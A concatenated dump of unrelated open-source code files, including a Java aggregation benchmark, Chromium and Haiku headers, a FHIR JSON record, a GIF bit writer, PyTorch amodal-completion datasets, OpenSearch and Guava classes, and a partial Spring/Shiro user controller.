            AggregateMode.ITER_FINAL,
            new AggregationFunction[] { sumAggregation },
            Version.CURRENT,
            new Input[][] { {inExpr0 } },
            new Input[] { Literal.BOOLEAN_TRUE }
        );
    }

    // Measures iterate+finalize over the full row set: accumulate every row
    // into fresh aggregation state, then finish it into result rows.
    @Benchmark
    public Iterable<Row> measureAggregateCollector() {
        Object[] state = collector.supplier().get();
        BiConsumer<Object[], Row> accumulator = collector.accumulator();
        Function<Object[], Iterable<Row>> finisher = collector.finisher();
        for (int i = 0; i < rows.size(); i++) {
            accumulator.accept(state, rows.get(i));
        }
        return finisher.apply(state);
    }
}
| 1,511 |
777 | <gh_stars>100-1000
// Copyright 2015 The Chromium Authors. All rights reserved.
// Use of this source code is governed by a BSD-style license that can be
// found in the LICENSE file.
#ifndef FontFallbackPriority_h
#define FontFallbackPriority_h

namespace blink {

// http://unicode.org/reports/tr51/#Presentation_Style discusses the differences
// between emoji in text and the emoji in emoji presentation. In that sense, the
// EmojiEmoji wording is taken from there. Also compare
// http://unicode.org/Public/emoji/1.0/emoji-data.txt
enum class FontFallbackPriority {
  // For regular non-symbols text,
  // normal text fallback in FontFallbackIterator
  Text,
  // For emoji in text presentation
  EmojiText,
  // For emoji in emoji presentation
  EmojiEmoji,
  Invalid
};

bool isNonTextFallbackPriority(FontFallbackPriority);

}  // namespace blink

#endif
| 261 |
648 | <filename>spec/hl7.fhir.core/1.0.2/package/DataElement-Immunization.explanation.json<gh_stars>100-1000
{"resourceType":"DataElement","id":"Immunization.explanation","meta":{"lastUpdated":"2015-10-24T07:41:03.495+11:00"},"url":"http://hl7.org/fhir/DataElement/Immunization.explanation","status":"draft","experimental":true,"stringency":"fully-specified","element":[{"path":"Immunization.explanation","short":"Administration/non-administration reasons","definition":"Reasons why a vaccine was or was not administered.","min":0,"max":"1","type":[{"code":"BackboneElement"}],"mapping":[{"identity":"rim","map":"n/a"}]}]} | 191 |
543 | <gh_stars>100-1000
/*
* Copyright (c) 2005, 2018, Oracle and/or its affiliates. All rights reserved.
* DO NOT ALTER OR REMOVE COPYRIGHT NOTICES OR THIS FILE HEADER.
*
* This code is free software; you can redistribute it and/or modify it
* under the terms of the GNU General Public License version 2 only, as
* published by the Free Software Foundation. Oracle designates this
* particular file as subject to the "Classpath" exception as provided
* by Oracle in the LICENSE file that accompanied this code.
*
* This code is distributed in the hope that it will be useful, but WITHOUT
* ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or
* FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License
* version 2 for more details (a copy is included in the LICENSE file that
* accompanied this code).
*
* You should have received a copy of the GNU General Public License version
* 2 along with this work; if not, write to the Free Software Foundation,
* Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
*
* Please contact Oracle, 500 Oracle Parkway, Redwood Shores, CA 94065 USA
* or visit www.oracle.com if you need additional information or have any
* questions.
*/
package com.sun.imageio.plugins.common;
import java.io.IOException;
import javax.imageio.stream.ImageOutputStream;
/*
 * Came from GIFEncoder initially.
 * Modified to allow outputting compressed data without the block counts
 * that break up the compressed data stream for GIF.
 */
public class BitFile {

    ImageOutputStream output; // destination for all emitted bytes
    byte[] buffer;            // 256-byte staging buffer (GIF blocks hold at most 255 data bytes)
    int index;                // current byte position within buffer
    int bitsLeft; // bits left at current index that are avail.

    /** note this also indicates gif format BITFile (block counts emitted before data). **/
    boolean blocks = false;

    /**
     * @param output destination for output data
     * @param blocks GIF LZW requires block counts for output data
     */
    public BitFile(ImageOutputStream output, boolean blocks) {
        this.output = output;
        this.blocks = blocks;
        buffer = new byte[256];
        index = 0;
        bitsLeft = 8;
    }

    /**
     * Writes any buffered bytes to the output (prefixed with a block count in
     * GIF mode) and resets the buffer. A partially filled final byte
     * (bitsLeft != 8) is flushed as a whole byte.
     */
    public void flush() throws IOException {
        int numBytes = index + (bitsLeft == 8 ? 0 : 1);
        if (numBytes > 0) {
            if (blocks) {
                output.write(numBytes);
            }
            output.write(buffer, 0, numBytes);
            buffer[0] = 0;
            index = 0;
            bitsLeft = 8;
        }
    }

    /**
     * Appends the low {@code numbits} bits of {@code bits} to the stream.
     * In GIF (blocks) mode, bits are packed LSB-first and full 255-byte
     * blocks are emitted with a leading count byte; otherwise bits are
     * packed MSB-first with no counts.
     *
     * @param bits    value whose low-order bits are written
     * @param numbits number of bits of {@code bits} to write
     */
    public void writeBits(int bits, int numbits) throws IOException {
        int bitsWritten = 0;
        int numBytes = 255; // gif block count
        do {
            // This handles the GIF block count stuff: emit a full 255-byte
            // block once the buffer cannot take another whole byte.
            if ((index == 254 && bitsLeft == 0) || index > 254) {
                if (blocks) {
                    output.write(numBytes);
                }
                output.write(buffer, 0, numBytes);

                buffer[0] = 0;
                index = 0;
                bitsLeft = 8;
            }

            if (numbits <= bitsLeft) { // bits contents fit in current index byte
                if (blocks) { // GIF: pack starting at the lowest free bit (LSB-first)
                    buffer[index] |= (bits & ((1 << numbits) - 1)) << (8 - bitsLeft);
                    bitsWritten += numbits;
                    bitsLeft -= numbits;
                    numbits = 0;
                } else { // non-GIF: pack starting at the highest free bit (MSB-first)
                    buffer[index] |= (bits & ((1 << numbits) - 1)) << (bitsLeft - numbits);
                    bitsWritten += numbits;
                    bitsLeft -= numbits;
                    numbits = 0;
                }
            } else { // bits overflow from current byte to next.
                if (blocks) { // GIF
                    // if bits > space left in current byte then the lowest order bits
                    // of code are taken and put in current byte and rest put in next.
                    buffer[index] |= (bits & ((1 << bitsLeft) - 1)) << (8 - bitsLeft);
                    bitsWritten += bitsLeft;
                    bits >>= bitsLeft;
                    numbits -= bitsLeft;
                    buffer[++index] = 0;
                    bitsLeft = 8;
                } else {
                    // if bits > space left in current byte then the highest order bits
                    // of code are taken and put in current byte and rest put in next.
                    // at highest order bit location !!
                    int topbits = (bits >>> (numbits - bitsLeft)) & ((1 << bitsLeft) - 1);
                    buffer[index] |= topbits;
                    numbits -= bitsLeft; // ok this many bits gone off the top
                    bitsWritten += bitsLeft;
                    buffer[++index] = 0; // next index
                    bitsLeft = 8;
                }
            }
        } while (numbits != 0);
    }
}
| 2,067 |
1,338 | // Clipboard.h
#ifndef CLIPBOARD_H
#define CLIPBOARD_H
#include <String.h>
#include <Message.h>
#include <Messenger.h>
#include "WatchingService.h"
// A named clipboard holding one BMessage of data plus the BMessenger that
// supplied it, with a watcher list notified on changes.
// (Declaration only; semantics below inferred from names — confirm in the .cpp.)
class Clipboard {
public:
    Clipboard(const char *name);
    ~Clipboard();

    // Stores new clipboard data and remembers who provided it.
    void SetData(const BMessage *data, BMessenger dataSource);
    const BMessage *Data() const;
    BMessenger DataSource() const;

    // Presumably a change counter incremented on SetData — verify in impl.
    int32 Count() const;

    // Watcher registration; returns false on failure (e.g. invalid messenger?).
    bool AddWatcher(BMessenger watcher);
    bool RemoveWatcher(BMessenger watcher);
    void NotifyWatchers();

private:
    BString fName;                      // clipboard name
    BMessage fData;                     // current clipboard contents
    BMessenger fDataSource;             // who set the current contents
    int32 fCount;                       // see Count()
    WatchingService fWatchingService;   // manages registered watchers
};
#endif // CLIPBOARD_H
| 240 |
733 | import numpy as np
try:
import mc
except Exception:
pass
import cv2
import os
from PIL import Image
import torch
from torch.utils.data import Dataset
import torchvision.transforms as transforms
import utils
from . import reader
import inference as infer
class SupCompDataset(Dataset):
    """Supervised amodal-completion dataset.

    Each item is a ``(rgb, modal_mask, amodal_target)`` triple cropped and
    resized around a single annotated instance.
    """

    def __init__(self, config, phase):
        self.dataset = config['dataset']
        if self.dataset == 'COCOA':
            self.data_reader = reader.COCOADataset(config['{}_annot_file'.format(phase)])
        else:
            self.data_reader = reader.KINSLVISDataset(
                self.dataset, config['{}_annot_file'.format(phase)])
        self.img_transform = transforms.Compose([
            transforms.Normalize(config['data_mean'], config['data_std'])
        ])
        self.sz = config['input_size']
        self.phase = phase
        self.config = config
        self.initialized = False
        # memcached is enabled iff a client config path is given; the old
        # boolean 'memcached' config key was immediately overwritten (dead code).
        self.memcached_client = config.get('memcached_client', None)
        self.memcached = self.memcached_client is not None

    def __len__(self):
        return self.data_reader.get_instance_length()

    def _init_memcached(self):
        """Lazily create the memcached client (once per worker process)."""
        if not self.initialized:
            assert self.memcached_client is not None, "Please specify the path of your memcached_client"
            server_list_config_file = "{}/server_list.conf".format(self.memcached_client)
            client_config_file = "{}/client.conf".format(self.memcached_client)
            self.mclient = mc.MemcachedClient.GetInstance(server_list_config_file, client_config_file)
            self.initialized = True

    def _load_image(self, fn):
        """Load an RGB PIL image from memcached if enabled, else from disk."""
        if self.memcached:
            try:
                img_value = mc.pyvector()
                self.mclient.Get(fn, img_value)
                img_value_str = mc.ConvertBuffer(img_value)
                img = utils.pil_loader(img_value_str)
            except Exception:
                # was a bare 'except:', which would also trap KeyboardInterrupt
                print('Read image failed ({})'.format(fn))
                raise Exception("Exit")
            else:
                return img
        else:
            return Image.open(fn).convert('RGB')

    def _get_inst(self, idx, load_rgb=False, randshift=False):
        """Crop one instance; resamples a random index for degenerate instances.

        Returns ``(modal, amodal, rgb_or_None)`` where masks are uint8 arrays
        of shape (sz, sz) and rgb (when requested) is a normalized CHW tensor.
        """
        modal, bbox, category, imgfn, amodal = self.data_reader.get_instance(idx, with_gt=True)
        centerx = bbox[0] + bbox[2] / 2.
        centery = bbox[1] + bbox[3] / 2.
        size = max([np.sqrt(bbox[2] * bbox[3] * self.config['enlarge_box']), bbox[2] * 1.1, bbox[3] * 1.1])
        if size < 5 or np.all(modal == 0):
            # tiny box or empty mask: retry with a random instance
            return self._get_inst(
                np.random.choice(len(self)), load_rgb=load_rgb, randshift=randshift)

        # shift & scale augmentation (training only)
        if self.phase == 'train':
            if randshift:
                centerx += np.random.uniform(*self.config['base_aug']['shift']) * size
                centery += np.random.uniform(*self.config['base_aug']['shift']) * size
            size /= np.random.uniform(*self.config['base_aug']['scale'])

        # crop a square window around the (possibly jittered) center
        new_bbox = [int(centerx - size / 2.), int(centery - size / 2.), int(size), int(size)]
        modal = cv2.resize(utils.crop_padding(modal, new_bbox, pad_value=(0,)),
                           (self.sz, self.sz), interpolation=cv2.INTER_NEAREST)
        amodal = cv2.resize(utils.crop_padding(amodal, new_bbox, pad_value=(0,)),
                            (self.sz, self.sz), interpolation=cv2.INTER_NEAREST)

        # random horizontal flip, applied consistently to masks and rgb
        if self.config['base_aug']['flip'] and np.random.rand() > 0.5:
            flip = True
            modal = modal[:, ::-1]
            amodal = amodal[:, ::-1]
        else:
            flip = False

        if load_rgb:
            rgb = np.array(self._load_image(os.path.join(
                self.config['{}_image_root'.format(self.phase)], imgfn)))  # uint8 HWC
            rgb = cv2.resize(utils.crop_padding(rgb, new_bbox, pad_value=(0, 0, 0)),
                             (self.sz, self.sz), interpolation=cv2.INTER_CUBIC)
            if flip:
                rgb = rgb[:, ::-1, :]
            rgb = torch.from_numpy(rgb.astype(np.float32).transpose((2, 0, 1)) / 255.)
            rgb = self.img_transform(rgb)  # CHW, normalized
            return modal, amodal, rgb

        return modal, amodal, None

    def __getitem__(self, idx):
        if self.memcached:
            self._init_memcached()
        modal, amodal, rgb = self._get_inst(
            idx, load_rgb=self.config['load_rgb'], randshift=True)  # modal: uint8 {0, 1}
        if rgb is None:
            rgb = torch.zeros((3, self.sz, self.sz), dtype=torch.float32)  # 3HW
        modal_tensor = torch.from_numpy(
            modal.astype(np.float32)).unsqueeze(0)  # 1HW, float
        # np.int was removed in NumPy 1.24; int64 yields the LongTensor targets
        # that loss functions such as cross-entropy expect.
        target = torch.from_numpy(amodal.astype(np.int64))  # HW, int64
        return rgb, modal_tensor, target
class SupOrderDataset(Dataset):
    """Supervised occlusion-ordering dataset.

    Each item is ``(rgb, modal_a, modal_b, label)`` for a pair of instances in
    one image, where label 1 means the first mask occludes the second.
    """

    def __init__(self, config, phase):
        self.dataset = config['dataset']
        if self.dataset == 'COCOA':
            self.data_reader = reader.COCOADataset(config['{}_annot_file'.format(phase)])
        else:
            self.data_reader = reader.KINSLVISDataset(
                self.dataset, config['{}_annot_file'.format(phase)])
        self.img_transform = transforms.Compose([
            transforms.Normalize(config['data_mean'], config['data_std'])
        ])
        self.sz = config['input_size']
        self.phase = phase
        self.config = config
        self.initialized = False
        # memcached is enabled iff a client config path is given; the old
        # boolean 'memcached' config key was immediately overwritten (dead code).
        self.memcached_client = config.get('memcached_client', None)
        self.memcached = self.memcached_client is not None

    def __len__(self):
        return self.data_reader.get_image_length()

    def _init_memcached(self):
        """Lazily create the memcached client (once per worker process)."""
        if not self.initialized:
            assert self.memcached_client is not None, "Please specify the path of your memcached_client"
            server_list_config_file = "{}/server_list.conf".format(self.memcached_client)
            client_config_file = "{}/client.conf".format(self.memcached_client)
            self.mclient = mc.MemcachedClient.GetInstance(server_list_config_file, client_config_file)
            self.initialized = True

    def _load_image(self, fn):
        """Load an RGB PIL image from memcached if enabled, else from disk."""
        if self.memcached:
            try:
                img_value = mc.pyvector()
                self.mclient.Get(fn, img_value)
                img_value_str = mc.ConvertBuffer(img_value)
                img = utils.pil_loader(img_value_str)
            except Exception:
                # was a bare 'except:', which would also trap KeyboardInterrupt
                print('Read image failed ({})'.format(fn))
                raise Exception("Exit")
            else:
                return img
        else:
            return Image.open(fn).convert('RGB')

    def _get_pair(self, modal, bboxes, idx1, idx2, imgfn, load_rgb=False, randshift=False):
        """Crop the two instance masks (and optionally rgb) in a shared window
        around their combined bounding box."""
        bbox = utils.combine_bbox(bboxes[(idx1, idx2), :])
        centerx = bbox[0] + bbox[2] / 2.
        centery = bbox[1] + bbox[3] / 2.
        size = max([np.sqrt(bbox[2] * bbox[3] * 2.), bbox[2] * 1.1, bbox[3] * 1.1])

        # shift & scale augmentation (training only)
        if self.phase == 'train':
            if randshift:
                centerx += np.random.uniform(*self.config['base_aug']['shift']) * size
                centery += np.random.uniform(*self.config['base_aug']['shift']) * size
            size /= np.random.uniform(*self.config['base_aug']['scale'])

        # crop both masks with the same square window so they stay aligned
        new_bbox = [int(centerx - size / 2.), int(centery - size / 2.), int(size), int(size)]
        modal1 = cv2.resize(utils.crop_padding(modal[idx1], new_bbox, pad_value=(0,)),
                            (self.sz, self.sz), interpolation=cv2.INTER_NEAREST)
        modal2 = cv2.resize(utils.crop_padding(modal[idx2], new_bbox, pad_value=(0,)),
                            (self.sz, self.sz), interpolation=cv2.INTER_NEAREST)

        # random horizontal flip, applied consistently to masks and rgb
        if self.config['base_aug']['flip'] and np.random.rand() > 0.5:
            flip = True
            modal1 = modal1[:, ::-1]
            modal2 = modal2[:, ::-1]
        else:
            flip = False

        if load_rgb:
            rgb = np.array(self._load_image(os.path.join(
                self.config['{}_image_root'.format(self.phase)], imgfn)))  # uint8 HWC
            rgb = cv2.resize(utils.crop_padding(rgb, new_bbox, pad_value=(0, 0, 0)),
                             (self.sz, self.sz), interpolation=cv2.INTER_CUBIC)
            if flip:
                rgb = rgb[:, ::-1, :]
            rgb = torch.from_numpy(rgb.astype(np.float32).transpose((2, 0, 1)) / 255.)
            rgb = self.img_transform(rgb)  # CHW, normalized
            return modal1, modal2, rgb

        return modal1, modal2, None

    def _get_pair_ind(self, idx):
        """Pick an image and return its masks plus all ordered occlusion pairs;
        resamples a random image when no ordered pair exists."""
        modal, category, bboxes, amodal, image_fn = self.data_reader.get_image_instances(
            idx, with_gt=True)
        gt_order_matrix = infer.infer_gt_order(modal, amodal)
        pairs = np.where(gt_order_matrix == 1)
        if len(pairs[0]) == 0:
            return self._get_pair_ind(np.random.choice(len(self)))
        return modal, bboxes, image_fn, pairs

    def __getitem__(self, idx):
        if self.memcached:
            self._init_memcached()
        modal, bboxes, image_fn, pairs = self._get_pair_ind(idx)
        randidx = np.random.choice(len(pairs[0]))
        idx1 = pairs[0][randidx]  # occluder
        idx2 = pairs[1][randidx]  # occludee

        # get pair
        modal1, modal2, rgb = self._get_pair(
            modal, bboxes, idx1, idx2, image_fn,
            load_rgb=self.config['load_rgb'], randshift=True)
        if rgb is None:
            rgb = torch.zeros((3, self.sz, self.sz), dtype=torch.float32)  # 3HW
        modal_tensor1 = torch.from_numpy(
            modal1.astype(np.float32)).unsqueeze(0)  # 1HW, float
        modal_tensor2 = torch.from_numpy(
            modal2.astype(np.float32)).unsqueeze(0)  # 1HW, float

        # randomly swap the pair so labels 1/0 are balanced
        if np.random.rand() < 0.5:
            return rgb, modal_tensor1, modal_tensor2, 1
        else:
            return rgb, modal_tensor2, modal_tensor1, 0
| 4,991 |
1,020 | package org.robobinding.viewattribute.property;
import org.robobinding.attribute.PropertyAttributeParser;
import org.robobinding.attribute.ValueModelAttribute;
/**
* @since 1.0
* @author <NAME>
*
*/
public class PropertyViewAttributeBinderFactory {
    private final Implementor implementor;
    private final PropertyAttributeParser propertyAttributeParser;

    /**
     * @param implementor strategy that builds the binder for a parsed attribute
     * @param propertyAttributeParser parser turning raw attribute strings into
     *        {@link ValueModelAttribute}s
     */
    public PropertyViewAttributeBinderFactory(Implementor implementor, PropertyAttributeParser propertyAttributeParser) {
        this.implementor = implementor;
        this.propertyAttributeParser = propertyAttributeParser;
    }

    /** Create a binder from an already parsed value-model attribute. */
    public PropertyViewAttributeBinder create(Object view, ValueModelAttribute attribute) {
        return implementor.create(view, attribute);
    }

    /** Parse the raw attribute string, then delegate to the parsed-attribute overload. */
    public PropertyViewAttributeBinder create(Object view, String attributeName, String attributeValue) {
        return create(view, propertyAttributeParser.parseAsValueModelAttribute(attributeName, attributeValue));
    }

    public static interface Implementor {
        PropertyViewAttributeBinder create(Object view, ValueModelAttribute attribute);
    }
}
| 310 |
700 | <gh_stars>100-1000
#include <loadcore.h>
#include <bdm.h>
#include <sifcmd.h>
#include <irx.h>
IRX_ID("bdmevent", 1, 1);
static void bdm_callback(int cause)
{
    /* Forwards a BDM (block device manager) event over SIF as command id 0.
       NOTE(review): the header is static, presumably so the buffer stays
       valid while the SIF transfer is in flight — confirm against the
       sceSifSendCmd contract. */
    static SifCmdHeader_t EventCmdData;
    /* the event cause travels in the command header's opt field */
    EventCmdData.opt = cause;
    sceSifSendCmd(0, &EventCmdData, sizeof(EventCmdData), NULL, NULL, 0);
}
int _start(int argc, char *argv[])
{
    /* IRX module entry point: register the event-forwarding callback with
       the block device manager and keep the module resident. */
    bdm_RegisterCallback(&bdm_callback);
    return MODULE_RESIDENT_END;
}
| 181 |
4,822 | <gh_stars>1000+
/*
* SPDX-License-Identifier: Apache-2.0
*
* The OpenSearch Contributors require contributions made to
* this file be licensed under the Apache-2.0 license or a
* compatible open source license.
*/
/*
* Licensed to Elasticsearch under one or more contributor
* license agreements. See the NOTICE file distributed with
* this work for additional information regarding copyright
* ownership. Elasticsearch licenses this file to you under
* the Apache License, Version 2.0 (the "License"); you may
* not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing,
* software distributed under the License is distributed on an
* "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
* KIND, either express or implied. See the License for the
* specific language governing permissions and limitations
* under the License.
*/
/*
* Modifications Copyright OpenSearch Contributors. See
* GitHub history for details.
*/
package org.opensearch.search.sort;
import org.opensearch.common.Strings;
import org.opensearch.common.io.stream.NamedWriteableRegistry;
import org.opensearch.common.time.DateFormatter;
import org.opensearch.common.xcontent.ToXContentFragment;
import org.opensearch.common.xcontent.XContentBuilder;
import org.opensearch.index.mapper.DateFieldMapper;
import org.opensearch.search.DocValueFormat;
import org.opensearch.test.AbstractNamedWriteableTestCase;
import java.io.IOException;
import java.time.ZoneId;
import static org.hamcrest.Matchers.equalTo;
import static org.hamcrest.Matchers.greaterThan;
import static org.hamcrest.Matchers.lessThan;
public class SortValueTests extends AbstractNamedWriteableTestCase<SortValue> {
    // Fixed formatter used to verify rendering through a non-RAW
    // DocValueFormat: millisecond values become ISO-8601 strings in UTC.
    private static final DocValueFormat STRICT_DATE_TIME = new DocValueFormat.DateTime(
        DateFormatter.forPattern("strict_date_time"),
        ZoneId.of("UTC"),
        DateFieldMapper.Resolution.MILLISECONDS
    );
    @Override
    protected Class<SortValue> categoryClass() {
        return SortValue.class;
    }
    @Override
    protected NamedWriteableRegistry getNamedWriteableRegistry() {
        return new NamedWriteableRegistry(SortValue.namedWriteables());
    }
    // Random instances cover both concrete SortValue variants (double and long).
    @Override
    protected SortValue createTestInstance() {
        return randomBoolean() ? SortValue.from(randomDouble()) : SortValue.from(randomLong());
    }
    // A mutation is any instance whose key differs from the original's.
    @Override
    protected SortValue mutateInstance(SortValue instance) throws IOException {
        return randomValueOtherThanMany(mut -> instance.getKey().equals(mut.getKey()), this::createTestInstance);
    }
    public void testFormatDouble() {
        assertThat(SortValue.from(1.0).format(DocValueFormat.RAW), equalTo("1.0"));
        // The date formatter coerces the double into a long to format it
        assertThat(SortValue.from(1.0).format(STRICT_DATE_TIME), equalTo("1970-01-01T00:00:00.001Z"));
    }
    public void testFormatLong() {
        assertThat(SortValue.from(1).format(DocValueFormat.RAW), equalTo("1"));
        assertThat(SortValue.from(1).format(STRICT_DATE_TIME), equalTo("1970-01-01T00:00:00.001Z"));
    }
    public void testToXContentDouble() {
        assertThat(toXContent(SortValue.from(1.0), DocValueFormat.RAW), equalTo("{\"test\":1.0}"));
        // The date formatter coerces the double into a long to format it
        assertThat(toXContent(SortValue.from(1.0), STRICT_DATE_TIME), equalTo("{\"test\":\"1970-01-01T00:00:00.001Z\"}"));
    }
    public void testToXContentLong() {
        assertThat(toXContent(SortValue.from(1), DocValueFormat.RAW), equalTo("{\"test\":1}"));
        assertThat(toXContent(SortValue.from(1), STRICT_DATE_TIME), equalTo("{\"test\":\"1970-01-01T00:00:00.001Z\"}"));
    }
    // Pins the cross-type ordering: any double sorts before any long,
    // even Double.MAX_VALUE vs Long.MIN_VALUE.
    public void testCompareDifferentTypes() {
        assertThat(SortValue.from(1.0), lessThan(SortValue.from(1)));
        assertThat(SortValue.from(Double.MAX_VALUE), lessThan(SortValue.from(Long.MIN_VALUE)));
        assertThat(SortValue.from(1), greaterThan(SortValue.from(1.0)));
        assertThat(SortValue.from(Long.MIN_VALUE), greaterThan(SortValue.from(Double.MAX_VALUE)));
    }
    public void testCompareDoubles() {
        double r = randomDouble();
        assertThat(SortValue.from(r), equalTo(SortValue.from(r)));
        assertThat(SortValue.from(r), lessThan(SortValue.from(r + 1)));
        assertThat(SortValue.from(r), greaterThan(SortValue.from(r - 1)));
    }
    public void testCompareLongs() {
        // Bounds leave room for the +1/-1 neighbours without overflow.
        long r = randomLongBetween(Long.MIN_VALUE + 1, Long.MAX_VALUE - 1);
        assertThat(SortValue.from(r), equalTo(SortValue.from(r)));
        assertThat(SortValue.from(r), lessThan(SortValue.from(r + 1)));
        assertThat(SortValue.from(r), greaterThan(SortValue.from(r - 1)));
    }
    // Renders a SortValue as a one-field JSON object: {"test":<value>}.
    public String toXContent(SortValue sortValue, DocValueFormat format) {
        return Strings.toString(new ToXContentFragment() {
            @Override
            public XContentBuilder toXContent(XContentBuilder builder, Params params) throws IOException {
                builder.field("test");
                return sortValue.toXContent(builder, format);
            }
        });
    }
}
| 1,883 |
759 | /*
* Copyright 2018 <NAME>
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*
*/
package com.rometools.modules.psc.io;
/**
* Constant definitions for XML attribute names.
*/
public interface PodloveSimpleChapterAttribute {
    // namespace prefix
    /** "psc". */
    String PREFIX = "psc";
    // name of the list of chapters
    /** "chapters": root element holding all chapter entries. */
    String CHAPTERS = "chapters";
    /** "version": schema version attribute of the chapters element. */
    String VERSION = "version";
    // name of a chapter entry
    /** "chapter": a single chapter element. */
    String CHAPTER = "chapter";
    // attributes of single chapter entries
    /** "start": start time of the chapter. */
    String START = "start";
    /** "title": chapter title. */
    String TITLE = "title";
    /** "href": link associated with the chapter. */
    String HREF = "href";
    /** "image": image associated with the chapter. */
    String IMAGE = "image";
}
| 398 |
47,880 | <filename>guava/src/com/google/common/collect/AllEqualOrdering.java
/*
* Copyright (C) 2012 The Guava Authors
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package com.google.common.collect;
import com.google.common.annotations.GwtCompatible;
import java.io.Serializable;
import java.util.List;
import javax.annotation.CheckForNull;
import org.checkerframework.checker.nullness.qual.Nullable;
/**
* An ordering that treats all references as equals, even nulls.
*
* @author <NAME>
*/
@GwtCompatible(serializable = true)
@ElementTypesAreNonnullByDefault
final class AllEqualOrdering extends Ordering<@Nullable Object> implements Serializable {
  static final AllEqualOrdering INSTANCE = new AllEqualOrdering();
  @Override
  public int compare(@CheckForNull Object left, @CheckForNull Object right) {
    // Every pair of references, including nulls, compares as equal.
    return 0;
  }
  @Override
  public <E extends @Nullable Object> List<E> sortedCopy(Iterable<E> iterable) {
    // Sorting under an all-equal comparator is the identity permutation,
    // so just copy the input order.
    return Lists.newArrayList(iterable);
  }
  @Override
  @SuppressWarnings("nullness") // unsafe: see supertype
  public <E extends @Nullable Object> ImmutableList<E> immutableSortedCopy(Iterable<E> iterable) {
    return ImmutableList.copyOf(iterable);
  }
  @SuppressWarnings("unchecked")
  @Override
  public <S extends @Nullable Object> Ordering<S> reverse() {
    // The reverse of an all-equal ordering is itself.
    return (Ordering<S>) this;
  }
  private Object readResolve() {
    // Preserve the singleton across serialization round-trips.
    return INSTANCE;
  }
  @Override
  public String toString() {
    return "Ordering.allEqual()";
  }
  private static final long serialVersionUID = 0;
}
| 612 |
435 | <filename>writethedocs-na-2016/videos/oops-i-became-an-engineer.json
{
"description": "<NAME>\nhttp://lanyrd.com/2016/writethedocs/sfbzty/\nFrom English professor and assistant dean to software engineer. How the heck did that happen? How hard was the transition? That seems\u2026different. And what the heck are developers thinking when they say the code explains itself? These are some of the comments and questions folks ask me when they learn my background.\nIncluded will be some commentary on learning to code, job prospects, and ways in which engineering is like grad school (for English). Also covered will be why development is an awesome career for folks who love words, grammar, and writing. Find out what\u2019s up with developers, documentation, and denying the need for it (DID YOU SEE THAT ALLITERATION? My gawd, I\u2019ve still got it).\nWhether you\u2019ve thought about moving into software engineering yourself, or maybe you want to hear how one can go about learning hard, new stuff, this may be the 15 minutes during which you\u2019ll want to skip the hallway track.",
"language": "eng",
"recorded": "2016-05-22",
"speakers": [
"<NAME>"
],
"thumbnail_url": "https://i.ytimg.com/vi/b_Bo0sHEc7A/hqdefault.jpg",
"title": "Oops, I Became an Engineer",
"videos": [
{
"type": "youtube",
"url": "https://www.youtube.com/watch?v=b_Bo0sHEc7A"
}
]
}
| 426 |
454 | <reponame>zwkjhx/vertx-zero
package io.vertx.up.annotations;
import io.vertx.up.eon.em.IpcType;
import java.lang.annotation.*;
/**
* Internal Rpc Channel
*/
@Target({ElementType.METHOD})
@Retention(RetentionPolicy.RUNTIME)
@Documented
@Inherited
public @interface Ipc {
    /**
     * Communication type ( 4 categories ).
     *
     * @return the category of this Ipc channel
     */
    IpcType type() default IpcType.UNITY;
    /**
     * Rpc service name.
     * 1. name != "" -> Sender
     * 2. name == "" -> Consumer ( Worker )
     *
     * @return identifies the rpc role ( 3 categories )
     */
    String name() default "";
    /**
     * Event Bus address; must be used together with name(). It means that
     * the current Ipc should send its message to
     * 1. Service ( name = xxx, from = xxx )
     *
     * @return used by the originator and the coordinator
     */
    String to() default "";
    /**
     * Event Bus address; must be used standalone. It means that the current
     * Ipc should only read messages and not send any out.
     * 1. Service ( name = current )
     * 2. value is used instead of the "from" direction.
     *
     * @return the default value helps to identify roles
     */
    String value() default "";
}
| 458 |
328 | package com.ctg.test.controller;
import com.ctg.test.model.User;
import com.ctg.test.service.UserService;
import org.apache.commons.lang.exception.ExceptionUtils;
import org.apache.shiro.SecurityUtils;
import org.apache.shiro.authz.annotation.RequiresPermissions;
import org.apache.shiro.authz.annotation.RequiresRoles;
import org.apache.shiro.subject.Subject;
import org.slf4j.Logger;
import org.slf4j.LoggerFactory;
import org.springframework.beans.factory.annotation.Autowired;
import org.springframework.stereotype.Controller;
import org.springframework.web.bind.annotation.RequestMapping;
import org.springframework.web.bind.annotation.RequestParam;
import org.springframework.web.bind.annotation.ResponseBody;
import java.util.Arrays;
import java.util.HashMap;
import java.util.List;
import java.util.Map;
/**
* @Description:
* @Author: yanhonghai
* @Date: 2018/9/17 1:00
* @RequiresRoles(value={"admin","user"},logical = Logical.OR)
* @RequiresPermissions(value={"add","update"},logical = Logical.AND)
*/
@Controller
@RequestMapping("/user")
public class UserController {
    private static final Logger logger = LoggerFactory.getLogger(UserController.class);
    @Autowired
    UserService userService;
    /**
     * Smoke-test endpoint: loads all users from the database.
     * http://localhost:8090/user/testDb
     * @return map with code/msg and the user list, or the stack trace on failure
     */
    @RequestMapping(value = {"/testDb"})
    @ResponseBody
    public Object testDb() {
        Map<String, Object> result = new HashMap<>();
        try {
            List<User> users = userService.findAll();
            result.put("code", "200");
            result.put("msg", "success");
            result.put("result", users);
        } catch (Exception e) {
            result.put("code", "201");
            result.put("msg", ExceptionUtils.getFullStackTrace(e));
        }
        return result;
    }
    /**
     * Exercises @RequiresRoles: only callers holding the "admin" role succeed.
